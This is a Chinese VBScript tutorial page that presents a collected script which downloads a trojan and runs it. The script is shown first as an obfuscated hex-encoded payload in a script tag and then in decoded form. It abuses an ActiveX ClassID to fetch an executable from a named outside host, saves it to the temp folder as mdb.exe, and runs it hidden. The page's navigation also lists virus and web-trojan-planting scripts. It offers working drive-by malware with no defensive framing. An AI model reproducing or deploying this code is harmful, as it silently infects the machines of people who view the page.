当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > 一个收集的下载木马并运行的VBS代码

VBScript
一个最简单的vbs类实例代码
实用vbs提醒小程序
使用vbs下载文件的代码加强版
vbs病毒制作之一复制自身的vbs脚本
用vbs实现的exe2swf工具脚本代码
vbs更改3389远程桌面端口的脚本
用vbs实现的强制杀进程的脚本
用VBS脚本实现更换Windows Xp序列号的代码
vbs实现右键菜单中添加CMD HERE
用VBS脚本删除指定以外的文件或文件夹
用VBS记录客户机操作的代码
用vbs删除某些类型文件和磁盘空间报告的脚本
两个批量挂马vbs脚本代码
关于vbs WebBrowser导航问题
LCL.VBS 病毒源代码
用vbs实现向任何电子邮件发送邮件
用VBS检测Guest状态的脚本
用vbs实现的输入助手附使用方法
vbs base64 解密脚本代码
用vbs实现修改dns的网关脚本

VBScript 中的 一个收集的下载木马并运行的VBS代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 68 ::
收藏到网摘: n/a

<script language="VBScript">
S="2020206F6E206572726F7220726573756D65206E6578740D0A737
3733D226D64622E657865220D0A61613D226F62220D0A6161613D22
6A65220D0A616161613D226374220D0A61616161613D22636C61220
D0A6161616161613D2273736964220D0A616161616161613D22636C
73220D0A61616161616161613D2269643A42443936220D0A6161616
161616161613D22433535362D3635220D0A61616161616161616161
3D2241332D313144220D0A61616161616161616161613D22302D393
8220D0A6161616161616161616161613D2233412D30304330344622
0D0A616161616161616161616161613D22433239453336220D0A6D6
D3D224D6963220D0A6E6E3D22726F73220D0A6D6D6E6E3D226F6674
2E58220D0A6E6E6D6D3D224D4C48220D0A6D6E6D6E3D22545450220
D0A6E6D3D6D6E0D0A62623D224164220D0A6262623D226F64220D0A
626262623D22622E5374220D0A62626262623D227265616D220D0A6
7673D2267220D0A65653D2265220D0A74743D2274220D0A63633D22
536372220D0A6363633D22697074220D0A636363633D22696E672E4
6220D0A6363313D22696C6553220D0A636363313D22797374220D0A
63636363313D22656D4F220D0A6363323D22626A220D0A636363323
D22656374220D0A68683D22536865220D0A6868683D226C6C2E4170
220D0A686868683D22706C69220D0A68686868683D2263617469220
D0A6868686868683D226F6E220D0A6F6F3D226F220D0A6F6F6F3D227
065220D0A6F6F6F6F3D226E220D0A536574207878787878787878203
D20646F63756D656E742E637265617465456C656D656E7428616126
6161612661616161290D0A78787878787878782E7365744174747269
62757465206161616161266161616161612C20616161616161612661
61616161616161266161616161616161612661616161616161616161
26616161616161616161616126616161616161616161616161266161
61616161616161616161610D0A53657420787878787878203D207878
7878787878782E4372656174654F626A656374286D6D266E6E266D6
D6E6E266E6E6D6D266D6E6D6E2C2222290D0A736574207878787820
3D2078787878787878782E6372656174656F626A6563742862622662
626226626262622662626262622C2222290D0A787878782E74797065
203D20310D0A7878787878782E4F70656E2067672665652674742C20
22687474703A2F2F71712E656532382E636E2F646F776E2F646F776E2
E657865222C2046616C73650D0A7878787878782E53656E640D0A78
7878787878783D7373730D0A20202020736574207878787878203D2
078787878787878782E6372656174656F626A6563742863632663636
32663636363266363312663636331266363636331266363322663636
3322C2222290D0A2020202073657420746D70203D2078787878782E
4765745370656369616C466F6C646572283229200D0A202020207878
78787878783D2078787878782E4275696C645061746828746D702C7
8787878787878290D0A20202020787878782E6F70656E0D0A2020202
0787878782E7772697465207878787878782E726573706F6E7365426
F64790D0A20202020787878782E73617665746F66696C65207878787
87878782C320D0A20202020787878782E636C6F73650D0A20202020
73657420717171203D2078787878787878782E6372656174656F626A
65637428686826686868266868686826686868686826686868686868
2C2222290D0A202020207171712E5368656C6C45786563757465207
87878787878782C22222C22222C6F6F266F6F6F266F6F6F6F2C30":D
="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMER
IC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEF
T(S,4)&N:S=MID(S,5)
LOOP:EXECUTE D
</script>
解密后:
复制代码 代码如下:

on error resume next
sss="mdb.exe"
aa="ob"
aaa="je"
aaaa="ct"
aaaaa="cla"
aaaaaa="ssid"
aaaaaaa="cls"
aaaaaaaa="id:BD96"
aaaaaaaaa="C556-65"
aaaaaaaaaa="A3-11D"
aaaaaaaaaaa="0-98"
aaaaaaaaaaaa="3A-00C04F"
aaaaaaaaaaaaa="C29E36"
mm="Mic"
nn="ros"
mmnn="oft.X"
nnmm="MLH"
mnmn="TTP"
nm=mn
bb="Ad"
bbb="od"
bbbb="b.St"
bbbbb="ream"
gg="g"
ee="e"
tt="t"
cc="Scr"
ccc="ipt"
cccc="ing.F"
cc1="ileS"
ccc1="yst"
cccc1="emO"
cc2="bj"
ccc2="ect"
hh="She"
hhh="ll.Ap"
hhhh="pli"
hhhhh="cati"
hhhhhh="on"
oo="o"
ooo="pe"
oooo="n"
Set xxxxxxxx = document.createElement(aa&aaa&aaaa)
xxxxxxxx.setAttribute aaaaa&aaaaaa, aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa
Set xxxxxx = xxxxxxxx.CreateObject(mm&nn&mmnn&nnmm&mnmn,"")
set xxxx = xxxxxxxx.createobject(bb&bbb&bbbb&bbbbb,"")
xxxx.type = 1
xxxxxx.Open gg&ee&tt, "http://qq.ee28.cn/down/down.exe", False
xxxxxx.Send
xxxxxxx=sss
set xxxxx = xxxxxxxx.createobject(cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2,"")
set tmp = xxxxx.GetSpecialFolder(2)
xxxxxxx= xxxxx.BuildPath(tmp,xxxxxxx)
xxxx.open
xxxx.write xxxxxx.responseBody
xxxx.savetofile xxxxxxx,2
xxxx.close
set qqq = xxxxxxxx.createobject(hh&hhh&hhhh&hhhhh&hhhhhh,"")
qqq.ShellExecute xxxxxxx,"","",oo&ooo&oooo,0